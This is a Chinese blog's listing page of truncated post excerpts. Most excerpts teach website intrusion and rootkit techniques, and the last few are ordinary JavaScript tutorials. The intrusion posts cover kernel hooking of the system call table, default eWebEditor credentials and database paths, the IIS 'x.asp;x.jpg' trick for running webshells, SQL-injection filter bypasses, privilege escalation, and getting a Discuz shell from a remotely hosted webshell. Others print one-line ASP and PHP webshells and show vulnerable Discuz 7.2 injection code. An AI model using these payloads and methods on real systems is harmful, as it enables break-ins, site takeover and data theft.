分类: |

Rootkit技术之内核钩子原理[3]

三、定义钩子函数 
内核钩子主要有三部分组成:要钩取的函数(在下文中称为目标函数)、替代要钩取的函数的函数(在下文中成为钩子函数)和系统调用表。前面部分介绍了系统调用表的问题,下面开始介绍钩子函数。一般说来,当定义自己的钩子函数时,可以先到DDK 的头文件中找到所想要的函数的原型,然后,稍加修改就能把目标函数变成钩子函数了。

例如,ZwMapViewOfSection 是一个内核函数,允许应用程序把从动态链接库导出的函数映射至内存。如果我们想要钩住这个内核函数,那么可以到ntddk.h头文件中查看其函数原型,如下所示:

查看更多...

分类:内核探究 | 固定链接 | 评论: 0 | 查看次数: 10098

Rootkit技术之内核钩子原理[2]

内存描述符表(MDL)的作用是将虚拟内存映射成物理页。如果将系统调用表所在内存页的MDL的MDLFlags成员设为MDL_MAPPED_TO_SYSTEM_VA 并且该页面被锁定的话,那么就可以使用内核钩子技术了。以下代码将可以达此目的:

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{

查看更多...

分类:内核探究 | 固定链接 | 评论: 0 | 查看次数: 7802

Rootkit技术之内核钩子原理[1]

我们知道,应用程序总是离不开系统内核所提供的服务,比如它要使用内存的时候,只要跟操作系统申请就行了,而不用自己操心哪里有空闲的内存空间等问题,实际上,这些问题是由操作系统的内核来代劳的。站在黑客的角度讲,如果能够控制内核,实际上就是控制了内核之上的各种应用程序。本文将向您介绍如何建立内核级钩子来控制操作系统向上提供的各种低级功能。有了内核级钩子,我们不但能够控制、监视其他程序并过滤有关数据,还能用其实现Rootkit本身及其它程序的隐形。

本文首先回顾系统调用表和内存保护方面的知识,然后讲解如何实现内核钩子,最后对一些重要的内核函数进行了简要的说明。

一、系统调用表

查看更多...

分类:内核探究 | 固定链接 | 评论: 0 | 查看次数: 7420

入侵的近点技巧

1. 判断服务器所使用的系统
例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。
2. Ewebeditor拿站的新技巧
Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
3. 社工的小技巧

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6404

IIS 解析0Day jpg类型当作asp解析

当上传图片为x.asp;x.jpg时,IIS会自动解析为asp格式,

所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。

把webshell文件名改成

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8352

绕过注入限制继续注入的方法汇总

突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……

  经过我的收集,大部分的防注入程序都过滤了以下关键字:

  and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7569

wscript.shell关闭时提权用

可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8115
默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,
路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)
MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。
几个主要的配置有:
ServerComment:我的网站 //站点的名称

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8336

入侵大站的完整思路

注:
1.acunetix web vulnerability Scanner 4 简称AC4
2.另外以下一种方式走的通,就不用往下走了
3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的.
4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6310

一句话木马的多种写法

asp一句话
<%execute(request("1"))%>

php一句话
<?php eval($_POST[1]);?>

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 8267

Discuz! "$referer"输出值跨站漏洞

影响版本:Discuz! 7.X、Discuz! 6.X、Discuz! 5.X、Discuz!NT 3.X
其他版本可能也存在此问题。任何对referer进行赋值并输出的网站程序都存在该弱点。
漏洞描述:
在Discuz! 任意版本中存在以下页面:
/templates/default/attachpay.htm

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9227
无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.zeroplace.cn/shell.txt
3. 在任意位置输入:

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7069

Discuz! 7.2 存在注入漏洞

影响版本:
discuz! 7.2
漏洞描述:
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

/manyou/sources/notice.php

if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("Delete FROM {$tablepre}myinvite Where appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("Select * FROM {$tablepre}myinvite Where hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("Delete FROM {$tablepre}myinvite Where hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("Delete FROM {$tablepre}mynotice Where id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
<*参考
www.discuz.net
*>
测试方法:
[Www.0daynet.Como]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 10888

使用SC命令行配置启动windows服务

大家对于系统中的服务应该了解甚少,在这里我给大家详细介绍下,用SC命令来执行对windows XP 服务的执行
先来简单介绍下SC命令中的一些作用.首先大家打开“命令提示符”。 如果连“命令提示符”。 这个东西都不知道的话,可谓笑话了不多说了.点开始,运行CMD 可以打开“命令提示符”。 键入: sc configservice namestart= {boot|system|auto|demand|disabled} 
值 描述 
sc config 
修改注册表和“服务控制管理器”数据库中的服务项的值。 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8860

JS中document.all还是document.getElementsByName

当页面上的控件同名且多个的时候,你首先做的是什么?判断长度?的确,从程序的严密角度出发,我们是需要判断长度,而且有长度和没长度是两种引用方法.我们来看:
oEle= document.all.aaa ;//这里有一个aaa的对象,但我们不知道它现在长度是多少,所以没办法对它操作.因此,我们要先做判断长度的过程.如下:
if(oEle.length){}else{};
在两种情况下,花括号里面的内容写法也是不一样的:
if(oEle.length){

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 8520

JS document对象详解

对象属性 
document.title //设置文档标题等价于HTML的<title>标签 
document.bgColor //设置页面背景色 
document.fgColor //设置前景色(文本颜色) 

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 10266

在HTML中用JS获取GET的参数

/** 
* 模仿request.getParameter(); 
* 但是只能接收三种提交 
* <form method=GET ..>...</form> 
* <a href="xxx.html?a=b&dc=3">xxx</a> 

查看更多...

分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 11294

如何在html中调用JS文件

一、JavaScript脚本语言的特性
    JavaScript脚本语言是一种面向浏览器的网页脚本编程语言。脚本语言有以下几个特性:
1、在客户端执行。完全在用户的计算机上运行,无须经过服务器。
2、面向对象。具有内置对象,也可以直接操作浏览器对象。
3、动态变化。可以对用户的输入作出反应,也可以直接对用户输出。

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 14337

Google的js判断密码强度

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html" />
<title>无标题文档</title>

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 8934

JavaScript For 循环(js for)

JavaScript 中的循环用来将同一段代码执行指定的次数(或者当指定的条件为 true 时)。
实例
For 循环 
如何编写 loop 循环来按照指定的次数执行相同的代码。 
循环产生 HTML 标题 

查看更多...

分类:web前端 | 固定链接 | 评论: 0 | 查看次数: 7901